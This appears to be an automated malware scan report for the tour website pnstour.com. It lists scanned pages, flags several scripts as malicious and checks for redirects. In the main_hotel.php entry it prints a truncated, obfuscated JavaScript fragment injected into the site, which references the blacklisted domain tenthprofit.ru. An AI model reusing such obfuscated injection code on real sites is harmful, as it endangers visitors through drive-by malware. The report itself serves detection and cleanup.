Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pnstour.com
Result: Google marks this website as suspicious; visiting it may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://pnstour.com/ | 200 OK Content-Length: 46291 Content-Type: text/html | clean |
http://pnstour.com/index.php | 200 OK Content-Length: 47434 Content-Type: text/html | clean |
http://pnstour.com/main_hotel.php | 200 OK Content-Length: 100804 Content-Type: text/html | malicious |
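Malicious code found: the script references the blacklisted domain tenthprofit.ru. In the obfuscated excerpt below, the helper F() is a thin wrapper around substr, and the fragments passed to String(...) concatenate to the path "/google.com/tom.com/yelp.com.php". Because the target is assembled at run time, a plain-text search for the full URL will not find it; when cleaning the site, search the files for this fragment pattern as well as for the domain.
var iA={aI:false};V=42093;V++;var AG='';var A;j=10166;j+=87;x=function(){function F(JO,Z,s){return JO.substr(Z,s);}var P=RegExp;var i=String("/g"+"oo"+"gl"+F("e.vWUc",0,2)+"co"+F("vSGm/SGv",3,2)+F("toY95N",0,2)+"m."+F("comWi6",0,2)+F("Ltdm/tdL",3,2)+"ye"+F("LGZklpGkLZ",4,2)+".c"+F("e1Som1Se",3,2)+F("aH2.paH2",3,2)+F("blknhplbkn",4,2));em=21362;em+=155;g=["WF","y"];this.d=47169;this.d--;var R='';var JJ=document;var ek="";function J(JO,Z){this.Cv=20447;t ...[1118 bytes skipped]... | ||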
http://pnstour.com/transport.php | 200 OK Content-Length: 25554 Content-Type: text/html | clean |
http://pnstour.com/tours.php | 200 OK Content-Length: 33277 Content-Type: text/html | clean |
http://pnstour.com/promotion.php | 200 OK Content-Length: 22909 Content-Type: text/html | clean |
http://pnstour.com/thaifeature.php | 200 OK Content-Length: 34738 Content-Type: text/html | clean |
http://pnstour.com/contact.php | 200 OK Content-Length: 42223 Content-Type: text/html | clean |
http://pnstour.com/hotel.php?id_province=PR-2523&&province=Bangkok | 200 OK Content-Length: 41529 Content-Type: text/html | clean |
http://pnstour.com/js/prototype.js | 200 OK Content-Length: 21184 Content-Type: application/javascript | malicious |
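Malicious code, confirmed by antivirus engines (see below). The excerpt shows only the start of the file, which reads like the ordinary Prototype 1.4.0 header; the flagged code is presumably located further into the file and is not visible in this excerpt. The same applies to the other /js/ entries below.
var Prototype = { Version: '1.4.0', ScriptFragment: '(?:<script.*?>)((\n|\r|.)*?)(?:<\/script>)', emptyFunction: function() {}, K: function(x) {return x} } var Class = { create: function() { return function() { this.initialize.apply(this, arguments); } } } var Abstract = new Object(); Object.extend = function(destination, source) { for (property in source) { destination[property] = source[
Antivirus reports: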
| ||
http://pnstour.com/js/scriptaculous.js?load=effects | 200 OK Content-Length: 6018 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Scriptaculous = { Version: '1.5.1', require: function(libraryName) { document.write('<script type="text/javascript" src="'+libraryName+'"></script>'); }, load: function() { if((typeof Prototype=='undefined') || parseFloat(Prototype.Version.split(".")[0] + "." + Prototype.Version.split(".")[1]) < 1.4) throw("script.aculo.us requires the Prototype JavaScript framework >= 1.4.0"); Antivirus reports:
| ||
http://pnstour.com/js/lightbox.js | 200 OK Content-Length: 27248 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var fileLoadingImage = "images/loading.gif"; var fileBottomNavCloseImage = "images/closelabel.gif"; var animate = true; var resizeSpeed = 7; var borderSize = 10; var imageArray = new Array; var activeImage; if(animate == true){ overlayDuration = 0.2; if(resizeSpeed > 10){ resizeSpeed = 10;} if(resizeSpeed < 1){ resizeSpeed = 1;} resizeDuration = (11 - resizeSpeed) * 0.15; } else { overlayDuration = 0; resizeDuration = 0; } Antivirus reports:
| ||
http://pnstour.com/js/ajax-dynamic-content.js | 200 OK Content-Length: 8437 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var enableCache = true; var jsCache = new Array(); var dynamicContent_ajaxObjects = new Array(); function ajax_showContent(divId,ajaxIndex,url,callbackOnComplete) { var targetObj = document.getElementById(divId); targetObj.innerHTML = dynamicContent_ajaxObjects[ajaxIndex].response; if(enableCache){ jsCache[url] = dynamicContent_ajaxObjects[ajaxIndex].response; } dynamicContent_ajaxObjects[ajaxIndex] = false; Antivirus reports:
| ||
http://pnstour.com/js/ajax.js | 200 OK Content-Length: 9358 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function sack(file) { this.xmlhttp = null; this.resetData = function() { this.method = "POST"; this.queryStringSeparator = "?"; this.argumentSeparator = "&"; this.URLString = ""; this.encodeURIString = true; this.execute = false; this.element = null; this.elementObj = null; this.requestFile = file; this.vars = new Object(); this.responseStatus = new Array(2); Antivirus reports:
| ||
http://pnstour.com/js/ajax-tooltip.js | 200 OK Content-Length: 8653 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var x_offset_tooltip = 5; var y_offset_tooltip = 0; var ajax_tooltipObj = false; var ajax_tooltipObj_iframe = false; var ajax_tooltip_MSIE = false; if(navigator.userAgent.indexOf('MSIE')>=0)ajax_tooltip_MSIE=true; var currentTooltipObject = false; function ajax_showTooltip(e,externalFile,inputObj) { currentTooltipObject = inputObj; if(document.all)e = even Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: pnstour.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 28 Sep 2014 15:36:26 GMT
Server: nginx/1.6.2
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
X-Powered-By: PHP/5.3.29
Second query (visit from search engine):
GET / HTTP/1.1
Host: pnstour.com
Referer: http://www.google.com/search?q=pnstour.com
Result:
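The result is similar to the first query; no suspicious redirects were found. Note that only the Referer header was varied in this test, so it does not rule out redirects that are conditioned on other request properties such as the User-Agent.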